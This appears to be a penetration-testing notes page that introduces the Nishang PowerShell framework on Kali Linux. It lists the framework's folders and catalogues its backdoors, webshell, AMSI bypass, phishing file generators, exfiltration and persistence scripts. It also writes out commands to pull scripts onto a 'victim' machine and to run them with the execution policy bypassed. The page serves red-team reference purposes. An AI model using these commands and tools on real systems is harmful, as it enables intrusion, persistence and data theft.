
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of pene

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.


Also installed by default on Kali:

root@kali:~# ls -l /usr/share/nishang/ 
total 48 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Antak-WebShell 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Backdoors 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Escalation 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Execution 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Gather 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Misc 
-rw-r--r-- 1 root root  495 Jun  4 11:14 nishang.psm1 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Pivot 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 powerpreter 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Prasadhak 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Scan 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Utility 

We will need to upload the nishang scripts into the victim computer:

powershell iwr -uri{Nishang script}

Load the script:

powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1


Nishang currently contains the following scripts and payloads.


  • Get-Unconstrained – Find computers in active directory which have Kerberos Unconstrained Delegation enabled.

Antak – the Webshell

  • Antak – Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.


  • HTTP-Backdoor – A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.

  • DNS_TXT_Pwnage – A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.

  • Execute-OnTime – A backdoor which can execute PowerShell scripts at a given time on a target.

  • Gupt-Backdoor – A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.

  • Add-ScrnSaveBackdoor – A backdoor which can use Windows screen saver for remote command and script execution.

  • Invoke-ADSBackdoor – A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

  • Add-RegBackdoor – A backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows key + U).

  • Set-RemoteWMI – Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user.

  • Set-RemotePSRemoting – Modify permissions of PowerShell remoting to allow access to a non-admin user.


  • Invoke-AmsiBypass – Implementation of publicly known methods to bypass/avoid AMSI.


  • Out-CHM – Create infected CHM files which can execute PowerShell commands and scripts.

  • Out-Word – Create Word files and infect existing ones to run PowerShell commands and scripts.

  • Out-Excel – Create Excel files and infect existing ones to run PowerShell commands and scripts.

  • Out-HTA – Create a HTA file which can be deployed on a web server and used in phishing campaigns.

  • Out-Java – Create signed JAR files which can be used with applets for script and command execution.

  • Out-Shortcut – Create shortcut files capable of executing PowerShell commands and scripts.

  • Out-WebQuery – Create IQY files for phishing credentials and SMB hashes.

  • Out-JS – Create JS files capable of executing PowerShell commands and scripts.

  • Out-SCT – Create SCT files capable of executing PowerShell commands and scripts.

  • Out-SCF – Create a SCF file which can be used for capturing NTLM hash challenges.



  • Download-Execute-PS – Download and execute a PowerShell script in memory.

  • Download_Execute – Download an executable in text format, convert it to an executable, and execute.

  • Execute-Command-MSSQL – Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.

  • Execute-DNSTXT-Code – Execute shellcode in memory using DNS TXT queries.

  • Out-RundllCommand – Execute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.





  • Prasadhak – Check running hashes of running process against the VirusTotal database.


  • Brute-Force – Brute force FTP, Active Directory, MSSQL, and Sharepoint.

  • Port-Scan – A handy port scanner.


  • Powerpreter – All the functionality of nishang in a single script module.



  • Add-Exfiltration – Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.

  • Add-Persistence – Add reboot persistence capability to a script.

  • Remove-Persistence – Remote persistence added by the Add-Persistence script.

  • Do-Exfiltration – Pipe (|) this to any script to exfiltrate the output.

  • Download – Transfer a file to the target.

  • Parse_Keys – Parse keys logged by the keylogger.

  • Invoke-Encode – Encode and compress a script or string.

  • Invoke-Decode – Decode and decompress a script or string from Invoke-Encode.

  • Start-CaptureServer – Run a web server which logs Basic authentication and SMB hashes.

  • ConvertTo-ROT13 – Encode a string to ROT13 or decode a ROT13 string.

  • Out-DnsTxt – Generate DNS TXT records which could be used with other scripts.

Last updated

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